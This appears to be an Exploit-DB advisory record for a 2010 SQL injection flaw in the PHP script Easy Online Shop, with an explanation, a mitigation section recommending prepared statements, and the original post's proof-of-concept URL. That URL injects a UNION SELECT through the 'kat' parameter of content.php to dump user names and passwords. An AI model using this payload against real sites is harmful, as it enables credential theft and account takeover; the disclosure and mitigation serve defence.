Vendor: Easy Online Shop
By: Easy Laster
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Easy Online Shop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2010

Easy Online Shop <= SQL injection Vulnerability Proof of Concept

An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP GET request to content.php on the vulnerable server. The 'kat' parameter is placed into a SQL query without escaping or parameter binding, so a single quote in the value closes the intended string literal and the remainder of the value is parsed as SQL. The published proof of concept appends a UNION SELECT with ten columns (the number the original query returns), places CONCAT(name,0x3a,password) in the fifth position so that each user's name and password are returned separated by a colon (0x3a), selects FROM users, and ends with "--" to comment out the rest of the original query. The concatenated name:password values are then rendered in the page where the category content would normally appear.

Mitigation:

Build the query with parameterized (prepared) statements so that the 'kat' value is bound as data and can never change the structure of the SQL. Input validation, for example an allow-list of the characters a category key may contain, is a useful second layer but should not be the only control, since it is easy to get wrong and does not address other injection points.
Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Easy Online Shop <=  SQL injection Vulnerability Proof of Concept
+Author : Easy Laster
+Date   : 17.12.2010
+Script  : Easy Online Shop
+Vendor : http://www.mhproducts.de/
+Price : 8,90 €
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project.com
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
  
---------------------------------------------------------------------------------------
                                                                                       
 ___ ___ ___ ___                         _ _           _____           _         _ 
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|          
  
  
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : users
+columns : name,password
+Proof of Concept : http://server/easyonlineshop/content.php?kat='+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--+
----------------------------------------------------------------------------------------